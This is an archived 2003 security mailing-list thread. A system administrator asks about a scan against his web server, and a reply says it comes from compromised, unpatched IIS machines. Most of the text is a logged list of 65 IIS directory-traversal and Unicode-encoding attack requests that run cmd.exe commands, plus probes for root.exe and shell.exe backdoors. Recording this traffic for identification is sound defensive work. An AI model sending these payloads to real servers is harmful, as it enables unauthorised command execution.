Security Incidents mailing list archives

RE: New attack or old Vulnerability Scanner?

From: "Keith" <keith () keithbergen com>
Date: Fri, 25 Apr 2003 17:40:40 -0400
Those are connect attempts FROM a vulnerable unpatched IIS boxen. If you run
an Apache server, or you run a fully patched IIS server, then you have
nothing to worry about. There is pretty much nothing you can do to stop the
attacks except to potentially write to the ISP and have them notify the
owner. I actually count the number of these on my web site with a Perl
script that I'd be happy to post if you like.

-----Original Message-----
From: Mark Embrich [mailto:mark_embrich () yahoo com] 
Sent: Thursday, April 24, 2003 7:44 PM
To: incidents () securityfocus com
Subject: New attack or old Vulnerability Scanner?




Hello,



Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?

Note that it also included:  "User-Agent:.Mozilla/3.0.

(compatible;.Indy.Library)...."

For which my googling tells me that this attack/scanner is probably 

built using Borland Delphi/C++ Builder suite.



I've so far received 3 of these from 2 different IP addresses.

The first two were from a Comcast cable user.

The last was from a Cox Communications IP.



Thanks,

Mark Embrich



0.      Scan TCP 80

1.      GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

2.      GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

3.      GET./_vti_bin/.%252e/.%252e/.%252e/.%

252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

4.      GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%

63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

5.      GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%

35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

6.      GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%

63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

7.      GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

8.      GET./_vti_bin/..%255c..%255c..%255c..%255c..%

255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

9.      GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

10.     GET./_vti_bin/..%c0%af../..%c0%af../..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

11.     GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

12.     GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

13.     GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

14.     GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

15.     GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

16.     GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

17.     GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%

252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

18.     GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

19.     GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

20.     GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

21.     GET./msadc/.%252e/.%252e/.%252e/.%

252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

22.     GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%

63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

23.     GET./msadc/..%%35%63../..%%35%63../..%%35%

63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

24.     GET./MSADC/..%%35c..%%35c..%%35c..%%

35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

25.     GET./msadc/..%%35c../..%%35c../..%%

35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

26.     GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%

63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

27.     GET./msadc/..%25%35%63../..%25%35%63../..%25%35%

63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

28.     GET./msadc/..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

29.     GET./msadc/..%255c../..%255c../..%

255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

30.     GET./msadc/..%c0%af../..%c0%af../..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

31.     GET./msadc/..%c0%af../..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

32.     GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%

af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..

33.     GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..

34.     GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..

35.     GET./PBServer/..%%35%63..%%35%63..%%35%

63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

36.     GET./PBServer/..%%35c..%%35c..%%

35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

37.     GET./PBServer/..%25%35%63..%25%35%63..%25%35%

63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

38.     GET./PBServer/..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

39.     GET./Rpc/..%%35%63..%%35%63..%%35%

63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

40.     GET./Rpc/..%%35c..%%35c..%%

35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

41.     GET./Rpc/..%25%35%63..%25%35%63..%25%35%

63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

42.     GET./Rpc/..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

43.     GET./samples/..%255c..%255c..%255c..%255c..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

44.     GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

45.     GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

46.     GET./scripts/.%252e/.%

252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

47.     GET./scripts/..%252f..%252f..%252f..%

252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

48.     GET./scripts/..%255c..%

255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

49.     GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

50.     GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%

AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

51.     GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

52.     GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

53.     GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%

1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

54.     GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

55.     GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

56.     GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%

9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

57.     GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

58.     GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

59.     GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

60.     GET./scripts/..%e0%80%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

61.     GET./scripts/..%f0%80%80%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

62.     GET./scripts/..%f8%80%80%80%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

63.     GET./scripts/..%fc%80%80%80%80%

af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..

64.     GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..

65.     GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..


----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------




----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the
world's premier event for IT and network security experts.  The two-day
Training features 6 hand-on courses on May 12-13 taught by professionals.
The two-day Briefings on May 14-15 features 24 top speakers with no vendor
sales pitches.  Deadline for the best rates is April 25.  Register today to
ensure your place. http://www.securityfocus.com/BlackHat-incidents
----------------------------------------------------------------------------
Current thread:

New attack or old Vulnerability Scanner? Mark Embrich (Apr 25)
- RE: New attack or old Vulnerability Scanner? Keith (Apr 28)
- <Possible follow-ups>
- RE: New attack or old Vulnerability Scanner? James C. Slora, Jr. (Apr 28)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 28)
- Re: New attack or old Vulnerability Scanner? rhandwerker (Apr 28)
- Re: New attack or old Vulnerability Scanner? jac (Apr 29)
- Re: New attack or old Vulnerability Scanner? Mark Embrich (Apr 29)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 30)
- Re: New attack or old Vulnerability Scanner? Jason Falciola (Apr 30)